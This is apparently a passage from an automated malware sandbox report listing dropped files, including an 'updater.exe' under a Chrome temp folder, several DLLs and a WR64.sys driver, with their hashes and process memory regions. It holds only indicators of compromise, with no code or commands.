| SHA256 | 75db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69 |
| SHA512 | b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0 |
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
memory/2232-100-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpCE85.tmp.bat
| MD5 | e87b986da2d91d9cc2203e6f12bdb13d |
| SHA1 | 729e54e08a5cc0784f4d90220a8a1298a6410145 |
| SHA256 | 44eeec4e1ef502fe97433d8588b09fc2e05d65079a3d1f3e071cbd1ae645cf56 |
| SHA512 | 6c5bf1a7c2290a0890534697ad41de4b5ee2821047c328fe279ef580a986ad67821493a15c0f18b6c012e852f34f4f42717c9181bffa12d8328100c90ccfac79 |
\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
memory/1900-107-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
memory/2632-108-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
memory/1900-109-0x000000013FAD0000-0x000000013FEEE000-memory.dmp
memory/1900-110-0x000000001BCB0000-0x000000001BD30000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d0bf3f094fc677a52e2f7f063edf2c85 |
| SHA1 | df3b4123b6e90b681c3cf0f30ef496ce86787aac |
| SHA256 | 47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4 |
| SHA512 | a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\07CGK9RARWSQRHXDB2S5.temp
| MD5 | d0bf3f094fc677a52e2f7f063edf2c85 |
| SHA1 | df3b4123b6e90b681c3cf0f30ef496ce86787aac |
| SHA256 | 47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4 |
| SHA512 | a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d |
memory/1744-117-0x000007FEF2A40000-0x000007FEF33DD000-memory.dmp
memory/1744-118-0x000000001B400000-0x000000001B6E2000-memory.dmp
memory/1744-119-0x000007FEF2A40000-0x000007FEF33DD000-memory.dmp
memory/1744-121-0x0000000001F90000-0x0000000001F98000-memory.dmp
memory/1744-122-0x0000000002850000-0x00000000028D0000-memory.dmp
memory/1744-120-0x0000000002850000-0x00000000028D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\AnonFileApi.dll
| MD5 | 7a2d5deab61f043394a510f4e2c0866f |
| SHA1 | ca16110c9cf6522cd7bea32895fd0f697442849b |
| SHA256 | 75db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69 |
| SHA512 | b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0 |
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
| MD5 | 6d1c62ec1c2ef722f49b2d8dd4a4df16 |
| SHA1 | 1bb08a979b7987bc7736a8cfa4779383cb0ecfa6 |
| SHA256 | 00da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c |
| SHA512 | c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2 |
memory/1744-125-0x0000000002850000-0x00000000028D0000-memory.dmp
memory/1744-126-0x000007FEF2A40000-0x000007FEF33DD000-memory.dmp
memory/1900-127-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
memory/1900-128-0x000000001BCB0000-0x000000001BD30000-memory.dmp
memory/1900-129-0x00000000007A0000-0x00000000007A6000-memory.dmp
memory/2028-130-0x0000000000060000-0x0000000000067000-memory.dmp
memory/2028-132-0x0000000000060000-0x0000000000067000-memory.dmp
memory/2028-134-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
memory/1900-135-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
memory/2028-136-0x000000001A790000-0x000000001A810000-memory.dmp
memory/2028-137-0x0000000001B20000-0x0000000001B26000-memory.dmp
memory/2028-138-0x000000001A790000-0x000000001A810000-memory.dmp
memory/2028-139-0x000000001A790000-0x000000001A810000-memory.dmp
memory/2028-140-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
memory/2028-141-0x000000001A790000-0x000000001A810000-memory.dmp
memory/2028-142-0x000000001A790000-0x000000001A810000-memory.dmp
memory/2028-143-0x000000001A790000-0x000000001A810000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d0bf3f094fc677a52e2f7f063edf2c85 |
| SHA1 | df3b4123b6e90b681c3cf0f30ef496ce86787aac |
| SHA256 | 47c3f6279033c90aa787c60c9e15792b57710a9c19811074a8106fc232bbdea4 |
| SHA512 | a32d72a3bcd9a9047bcc00aee153659e893d14759468afb437258ea2e8e22c7a1b0da7e7d386e289cd3f11992bd21acc636826d1b6106962f1e1e3ba170ada7d |
memory/2352-149-0x000007FEF28E0000-0x000007FEF327D000-memory.dmp
memory/2352-150-0x000007FEF28E0000-0x000007FEF327D000-memory.dmp
memory/2352-151-0x0000000002480000-0x0000000002500000-memory.dmp
memory/2352-152-0x0000000002480000-0x0000000002500000-memory.dmp
memory/2352-153-0x0000000002480000-0x0000000002500000-memory.dmp
memory/2352-154-0x0000000002480000-0x0000000002500000-memory.dmp
memory/2352-155-0x000007FEF28E0000-0x000007FEF327D000-memory.dmp
\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
memory/2948-158-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
memory/2948-159-0x000000013F2C0000-0x000000013F6DE000-memory.dmp
memory/2948-160-0x000000001BCD0000-0x000000001BD50000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 34dc4454196f0ad68db18c132e5e281c |
| SHA1 | b0ce0637ccbe63c97177fa298098deb9a1207d91 |
| SHA256 | 8ef8c0b7fcfe8ec307019ea0de462a7004de826415a941f9124fabed3a1a8995 |
| SHA512 | 65cc1698795f46c1bdf3d70110932159e37ed363514b82b137b4ef0022f84fb7566f1c88014d61982f2b4a7cae4ae35fa8a8ac12fb4dcd3b28ef8f60709a27a8 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2940-167-0x000007FEEE3C0000-0x000007FEEED5D000-memory.dmp
memory/2940-168-0x0000000002970000-0x00000000029F0000-memory.dmp
memory/2940-169-0x0000000002970000-0x00000000029F0000-memory.dmp
memory/2940-170-0x000007FEEE3C0000-0x000007FEEED5D000-memory.dmp
memory/2940-171-0x0000000002970000-0x00000000029F0000-memory.dmp
memory/2940-172-0x000007FEEE3C0000-0x000007FEEED5D000-memory.dmp
memory/2948-173-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
memory/2948-174-0x000000001BCD0000-0x000000001BD50000-memory.dmp
C:\Users\Admin\AppData\Roaming\Google\Libs\WR64.sys
| MD5 | 0c0195c48b6b8582fa6f6373032118da |
| SHA1 | d25340ae8e92a6d29f599fef426a2bc1b5217299 |
| SHA256 | 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 |
| SHA512 | ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d |
memory/2948-177-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp